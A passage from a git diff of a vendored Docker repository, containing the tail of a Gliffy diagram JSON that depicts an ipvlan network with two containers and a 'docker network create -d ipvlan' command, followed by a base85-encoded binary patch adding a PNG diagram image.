","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":27.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":129,"width":262.0,"height":124.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#929292","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":33.0,"y":157.96785409109907,"rotation":0.0,"id":114,"width":150.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":16,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.9951060358893704,"rotation":0.0,"id":95,"width":62.0,"height":36.17618270799329,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":4,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.2300163132136848,"rotation":0.0,"id":96,"width":3.719999999999998,"height":29.7161500815659,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":13,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":99,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":99,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8599999999999994,-1.2920065252854727],[1.8599999999999994,31.0081566068514]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.2300163132136848,"rotation":0.0,"id":97,"width":1.2156862745098034,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.292006525285804],[-1.4193795664340882,31.008156606851536]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.5073409461663854,"rotation":0.0,"id":98,"width":1.239999999999999,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.4306688417619762],[2.0393795664339223,32.73083197389853]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9380097879282103,"rotation":0.0,"id":99,"width":62.0,"height":32.300163132136866,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":2,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":38.326264274062034,"rotation":0.0,"id":112,"width":150.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container1

192.168.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":157.96785409109907,"rotation":0.0,"id":115,"width":150.0,"height":58.99999999999999,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":33,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.94518760195788,"rotation":0.0,"id":116,"width":62.0,"height":35.573246329526725,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.1761827079934557,"rotation":0.0,"id":117,"width":3.719999999999998,"height":29.220880913539798,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":30,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8600000000000136,-1.2704730831974018],[1.8600000000000136,30.49135399673719]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.1761827079934557,"rotation":0.0,"id":118,"width":1.2156862745098034,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.2704730831977067],[-1.4193795664340882,30.491353996737335]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.482218597063612,"rotation":0.0,"id":119,"width":1.239999999999999,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.42349102773260977],[2.0393795664339223,32.185318107666895]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9057096247960732,"rotation":0.0,"id":120,"width":62.0,"height":31.76182707993458,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":19,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":36.36247960848299,"rotation":0.0,"id":121,"width":150.0,"height":30.183360522022674,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container2

192.168.1.3/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":102.0,"y":130.1999969482422,"rotation":0.0,"id":130,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

pub_net (eth0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":93.0,"y":92.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"


","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":14.0,"y":114.19999694824219,"rotation":0.0,"id":142,"width":78.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":235.5,"rotation":0.0,"id":184,"width":196.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

docker network create -d ipvlan \\

    --subnet=192.168.1.0/24 \\

    --gateway=192.168.1.1 \\

    -o parent=eth0 pub_net

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":45}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#999999","strokeWidth":6,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457584497063,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png new file mode 100644 index 0000000000000000000000000000000000000000..e489a446ddd255ce9360445f0f895acad31ae214 GIT binary patch literal 20145 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 